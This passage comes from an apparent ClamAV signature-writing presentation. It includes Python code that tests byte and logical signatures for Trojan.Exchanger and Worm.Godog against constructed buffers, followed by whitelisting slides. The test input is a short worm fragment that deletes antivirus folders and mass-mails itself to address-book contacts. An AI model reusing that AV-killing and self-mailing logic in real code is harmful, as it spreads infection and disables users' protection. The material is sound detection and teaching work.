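    # (anywhere) or 'EP+n' (n bytes past the entry point). TargetType is not
    # checked because the inputs here are raw buffers, not parsed PE files.
    _name, _target, offset, body = sig.split(":", 3)
    pat = hex_sig_to_regex(body)
    if offset == "*":
        return pat.search(data) is not None
    return pat.match(data, ep + int(offset[2:])) is not None


def ldb_matches(line: str, data: bytes) -> bool:
    # One .ldb line, Name;TargetBlock;LogicalExpr;Subsig0;Subsig1;... Every
    # subsig is matched on its own, then the expression combines the results.
    parts = [p.strip() for p in line.split(";")]
    expr, subsigs = parts[2], parts[3:]
    if not re.fullmatch(r"[\d()&|]+", expr):
        raise ValueError("only subsig ids, |, & and parentheses are supported")
    hits = [hex_sig_to_regex(s).search(data) is not None for s in subsigs]
    # Character set validated above, so evaluating the rewritten expression is
    # safe: ids -> their match result, '&' -> and, '|' -> or. The slide's
    # expression is fully parenthesized, so operator precedence does not matter.
    py_expr = re.sub(r"\d+", lambda m: str(hits[int(m.group())]), expr)
    return bool(eval(py_expr.replace("&", " and ").replace("|", " or "), {"__builtins__": {}}))


# Trojan.Exchanger (.ndb) from the slides, against constructed buffers: EP placed
# at 0x10 and the call sequence 229 bytes later, as in the 5.exe / 7.exe samples.
EXCHANGER_SIG = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"
EP = 0x10
def exchanger_sample(imm_hex: str, gap: int = 229) -> bytes:
    body = "e81c000000e8e6ffffff81c3" + imm_hex + "e8dbffffffe846ffffffe2e4"
    return b"\0" * EP + b"\x90" * gap + bytes.fromhex(body) + b"\0" * 8
SAMPLE_5, SAMPLE_7 = exchanger_sample("c4766402"), exchanger_sample("83315a00")

# Worm.Godog (.ldb) from the slides, assembled from the plaintext the hex encodes
# (5c is the backslash), run over a constructed, already-normalized VBS snippet.
def _hx(s: str) -> str:
    return s.encode().hex()
AV_PATHS = [("fileexists (", ' & "\\kaspersky lab\\kaspersky antivirus personal'),
            ("fileexists(", ' & "\\antiviral toolkit pro'),
            ("fileexists (", ' & "\\avpersonal'),
            ("fileexists (", ' & "\\trend pc-cillin')]
SUBSIGS = [_hx(fe) + "{-25}" + _hx(p) + "{-100}" + _hx(".deletefile (") + "{-25}" + _hx(p)
           for fe, p in AV_PATHS]
SUBSIGS.append(_hx("for ") + "{-10}" + _hx(" = 1 to ") + "{-10}" + _hx(".addressentries.count")
               + "{-100}" + _hx("recipients.add") + "{-100}" + _hx("if ") + "{-10}" + _hx(" > ")
               + "{-5}" + _hx(" then exit for") + "{-300}" + _hx(".attachments.add")
               + "{-150}" + _hx(".send"))
GODOG_LDB = "Worm.Godog;Target:0;((0|1|2|3)&(4));" + ";".join(SUBSIGS)
GODOG_TEXT = (b'if fileexists (registro & "\\kaspersky lab\\kaspersky antivirus personal pro\\avp32.exe") then\n'
              b'legions.deletefile (registro & "\\kaspersky lab\\kaspersky antivirus personal pro\\*.*")\n'
              b'for d = 1 to b.addressentries.count\nc.recipients.add e\nif counter > 8000 then exit for\n'
              b'c.attachments.add "c:\\legion.vbs"\nc.send\n')
```

A file containing only the AV-killing code or only the mailer code fails the `(0|1|2|3)&(4)` expression, which is the point of the logical signature over four separate .ndb entries.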
29. Whitelisting
To whitelist a specific file create an entry in a database file with the extension .fp following the MD5 signature format:
• MD5:FileSize:Comment
30. Whitelisting (cont’d)
To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign:
• db_name:line_number:signature_name
To ignore the “myTestSignature” at line 23 in test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
31. More questions?
clamav-users@lists.clamav.net - user questions
clamav-devel@lists.clamav.net - technical discussions
Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net
If you have questions or comments on this presentation: azidouemba@sourcefire.com